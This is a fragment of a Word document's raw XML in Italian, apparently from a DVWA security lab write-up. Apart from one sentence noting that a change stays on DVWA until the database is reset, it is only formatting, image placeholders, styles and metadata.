        <w:t>permanente su DVWA a meno di non resettare il database</w:t>
      </w:r>
      <w:r w:rsidR="007C444E">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> nelle opzioni:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="42E52620" wp14:editId="7D5BB6D3">
            <wp:extent cx="6906224" cy="4014196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2016" cy="404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</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D21E6B" w:rsidRPr="00D21E6B" w:rsidRDefault="00D21E6B" w:rsidP="00D21E6B">
      <w:pPr>
        <w:jc w:val="right"/>
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D21E6B">
        <w:rPr>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="205B4D23" wp14:editId="41B4339E">
            <wp:extent cx="6746390" cy="4552558"/>
            <wp:effectExtent l="0" t="0" r="0" b="6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7540" cy="457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E7" w:rsidRDefault="002E40E7"/>
    <w:p w:rsidR="002E40E7" w:rsidRDefault="002E40E7"/>
    <w:sectPr w:rsidR="002E40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11A48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BE2A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9E11F5"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="3B56C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79"/>
    <w:rsid w:val="000541CD"/>
    <w:rsid w:val="00092055"/>
    <w:rsid w:val="002A6346"/>
    <w:rsid w:val="002C0E09"/>
    <w:rsid w:val="002E40E7"/>
    <w:rsid w:val="003658EE"/>
    <w:rsid w:val="004411AA"/>
    <w:rsid w:val="005346D1"/>
    <w:rsid w:val="00576CED"/>
    <w:rsid w:val="00692779"/>
    <w:rsid w:val="007C444E"/>
    <w:rsid w:val="007D3DEE"/>
    <w:rsid w:val="00913B6F"/>
    <w:rsid w:val="00A906B3"/>
    <w:rsid w:val="00D2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BADC9"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{DFF60A2B-359D-4847-9588-63C91405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5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58EE"/>
    <w:rPr>
      <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="messagelistitem6a4fb">
    <w:name w:val="messagelistitem__6a4fb"/>
    <w:basedOn w:val="Normale"/>
    <w:rsid w:val="00A90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A906B3"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="latin12compacttimestamp75bf7">
    <w:name w:val="latin12compacttimestamp__75bf7"/>
    <w:basedOn w:val="Carpredefinitoparagrafo"/>
    <w:rsid w:val="00A906B3"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Paragrafoelenco">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="Normale"/>
    <w:uiPriority w:val="34"/>
    <w:qFormat/>
    <w:rsid w:val="0057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5</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-01-19T08:35:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-01-19T12:02:00Z</dcterms:modified>
</cp:coreProperties>
</file>